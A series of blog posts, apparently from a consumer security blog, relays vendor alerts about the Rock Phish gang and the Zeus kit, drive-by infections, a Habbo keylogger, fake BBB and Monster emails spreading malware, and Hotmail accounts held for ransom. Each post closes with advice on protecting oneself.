Nowadays, all you need to do is visit the wrong site to have your personal information stolen!

On his birthday, Uriel Maimon of RSA reflected about a lot of personal things (as most of us do), as well as, how spam and phishing are becoming more sophisticated and dangerous.

One major player in the spam and phishing game are known as the "Rock Phish." In his birthday post, Uriel gives us a little historical perspective on the group:

The Rock Phish group is a phishing gang believed to be based out of Russia -- and, by some accounts, is responsible for roughly 50% of phishing attacks by volume. The Rock gang has also pioneered several new approaches in phishing: in 2004 it was the first (and, for a long time, they were the only) gang to employ bot-nets in its phishing infrastructure in order to make the attacks live longer and be more scalable. It also pioneered new techniques in its spam mails so the mail could more easily evade spam filters.

Apparently, the Rock Phish are now setting up a double whammy for anyone foolish enough to click on a socially engineered link received in a spam e-mail. Counting on the fact that a lot more people go to phishing sites than will actually type in their personal details, the Rock Phish are loading the sites with crimeware that steals personal information, automatically.

More specifically, Uriel describes the phenomenon of "drive by infection" as when:

This is done via a technique called "drive-by infection", wherein a vulnerability in the victim's operating system, browser, or software is exploited in order to infect the victim without his/her knowledge (and much less his/her consent, or with the victim having to proactively download software). The vulnerabilities that are exploited in these situations are often unknown to the software vendors and therefore often not addressed, leaving the victims defenseless (just like your humble servant finds himself when in the company of a beautiful woman).

Even worse, it appears that the Rock Phish make this easy for any criminal to mount a pretty sophisticated phising expedition by selling all the "tackle" necessary to do it for a measly $700.00.

Known as the "Zeus kit," in honor of the Zeus Trojan, the kit is pretty resistant to computer security programs and has the ability to mask itself using a binary generator. The binary generator sends out a unique set of numbers every time it is used, making it hard for security programs to detect since they rely on spotting what is known as a "signature." Even if a security program recognizes one signature, the binary generator changes it the next time, and the security program will probably fail to recognize it.

For the less technically inclined, the Zeus Kit offers a lot of operational capabilities for the information thief. Some of these capabilities are "the ability to take screenshots of a victim's machine, or control it remotely, or add additional pages to a website and monitor it, or steal passwords that have been stored by popular programs," according to Uriel.

There is little doubt that the criminal groups like the Rock Phish are making the Internet more dangerous all the time. So far as getting infected while "driving by" a site, Websense announced today that a mass attack via malicious JavaScript injection is infecting thousands of trusted sites, including government ones. According to report released today, this activity has exploded by a "factor of ten."

Sophos also mentioned in it's Q1 Security Threat Report that they are finding infected web pages at a rate of one every five seconds.

In simple terms, all the average web surfer has to do is visit one of these sites to become infected and have all their information stolen from them.

It's probably a good time to make sure you've updated the protection on your computer and to just say delete to any spam getting past whatever filer you are currently using. By the way, has anyone noticed besides me that more and more spam has been getting past these filters in the past couple of weeks?

Blog post at RSA by Uriel Malmon, here.

By the way, I noticed that despite a lot of us commenting on this great post, no one bothered to wish him a Happy Birthday. The post has a lot of good information on it and it would be nice to thank him for educating the rest of us.

Habbo Hotel Trojan Downloader poses as social networking site tool

Websense is reporting that a tool is being offered to "Habbo" users, which contains malicious code. The loaded tool is being offered by a third party software developer.

From the Websense alert:

Websense® Security Labs™ has received reports of a Trojan keylogger aimed at the users of Habbo, a popular social networking site for teenagers. As of last month, Habbo’s entry on Wikipedia said that over 8 million unique visitors access Habbo’s Web sites around the world every month. The party involved in spreading this malicious code poses as a third-party software tool developer for Habbo.

There seems to be very little out there about this, but I was able to find a BBC article from November about a teenager stealing $4,000 euros worth of virtual furniture using real money?

Based on the article, this isn't the first time (or probably the last) that Habbo users have faced the murkier waters of the Internet.

The article states:

A spokesman for Sulake, the company that operates Habbo Hotel, said: "The accused lured victims into handing over their Habbo passwords by creating fake Habbo websites.

"In Habbo, as in many other virtual worlds, scamming for other people's personal information such as user names has been problematic for quite a while.

"We have had much of this scamming going on in many countries but this is the first case where the police have taken legal action."

According to the article, there are a lot of spoofed Habbo sites, asking for user name and password information. FSecure.com did another article with screenshots of some of these spoofed sites.

In case anyone besides me is having a hard time understanding how real money is used to buy virtual furniture, Wikipedia offers a explanation:

Credits, also known as Coins in other websites, are the currency used in Habbo. Credits can be purchased using a variety of different services, such as credit card, a telephone service and via SMS. Credits are often given out as prizes for competitions held in the community. The Credits are stored in the user's purse accessible in any public or private room as well as on the Hotel view and while logged in on the website. Credits can also be redeemed into Exchange, which displays the Credits as an item of virtual furniture, the furniture can then be traded among users, and redeemed back into Credits.

At least now I can understand why someone would want to break into a Habbo account - they do have real money in them.

This might not have been the first time Habbo users have been exposed to assorted forms of malicious code. I found a discussion on Habbohut, a Habbo bulletin board, where the matter was being discussed in 2005.

Going back to the current alert from Websense, it has some pretty wise advice, which can be applied to any software tool being touted from an unknown source:

Websense Security Labs recommends caution when trying out new third-party applications developed for Web 2.0 and social networking Web sites, especially those with APIs open for third-party developers.

In other words, just say no!

Websense alert with screenshots, here.

Fake e-mail from the BBB stating someone complained about you is a scam!

If you get an e-mail from the Better Business Bureau stating that a complaint has been made against you - it might be a good idea to just delete it.

Websense is reporting:

Websense® Security Labs™ has received reports of a new email spam variant similar to an attack launched early this year. The spoofed email purports to be from the Better Business Bureau (BBB). The message claims that a complaint has been filed against the recipient's company. Attached to the message is a Microsoft Word document (Document_for_Case.doc), supposedly containing additional details regarding the complaint. The Word document actually contains a Trojan Downloader that, when opened, attempts to download and install a keylogger. This keylogger uploads stolen data to an IP address in Malaysia.

Keyloggers record the keystokes on a computer and then send them back to the crooks, who installed them.

They are normally interested in your password information, especially if it gives them access to personal financial data. That way they can rob you blind.

In case, you just have to know, whether or not, you've received a complaint at the Better Business Bureau, it might be a good idea to contact them independently to inquire into it.

Their website is here.

The best way to avoid becoming compromised is to have updated security software protecting your system and even better yet -- avoid clicking, or even opening unsolicited e-mails no matter, who they claim to be from!

Websense alert (with screenshots), here.

Monster lure used to install malicious code

Spoofed (spam) e-mails, claiming to be from Monster (the popular job site) are being used as a lure to install malware on computers.

The good people at Websense are reporting:

Websense® Security Labs™ has discovered emails that attempt to lure users to click on a link in order to upgrade their system security. The emails, which are spoofed from Monster, are written in HTML and claim that Monster systems have been upgraded and that users need to download a certified utility to be able to use Monster. The domain name that the emails point to are using five different IP addresses. Upon connecting to one of the IP addresses, the code is run, several files are downloaded and installed on the user's machine, and another file is downloaded and installed from a server in Denmark. The files appear to be designed to steal end-user information.

Websense alert, here.

Stealing end user information means that anyone unfortunate to have this code installed on their machine could become an identity theft victim.

Clicking on a link from an unsolicited e-mail can be dangerous. Of course, it also pays to have your computer protection up-to-date.

These types of lures to defraud people are known as social engineering. Wikipedia has an excellent article about social engineering, here.

Unfortunately, this isn't the first time a job site has been used as a vehicle to commit fraud.

Criminals often steal personal information posted on job sites, or trick people into giving it up by pretending to offer them a job. Another well known scam involving job sites is where people are recruited to negotiate fraudulent financial instruments (launder stolen money) and wire the money back to their (questionable employers).

Sometimes these financial instruments are outright counferfeits, also.

The Privacy Rights Clearinghouse has information on how to avoid fraud on job sites, here.

Hotmail Accounts being held for Ransom

Websense sent out an alert showing how Hotmail accounts are being held for ransom. Here's the warning (courtesy of Websense):

Websense® Security LabsTM has received reports of a new form of cyber-extortion. Unlike previously documented cases (where end-users were infected with malicious code, certain file types were encoded or encrypted, and a ransom message was left on the machine), this attack compromises users' online web mail accounts. When end-users logged into their web mail accounts (in this case Hotmail), they noticed that all their 'sent' and 'received' emails were deleted along with all their online contacts. The only message that remained was one from the attacker that requested they contact them for payment in order to receive the data back.

In this case, the end-users had recently visited an Internet cafe where their credentials may have been compromised.

The email, which was poorly written in Spanish, roughly translates in English to:

"If you want to know where your contacts and your emails are then pay us or if you prefer to lose everything then don't write soon!"

Websense alert, here.

Computers at Internet cafes and libraries have been known to contain all kinds of malware, and or crimeware.

It's probably best to be extremely careful when entering any sort of personal information on them.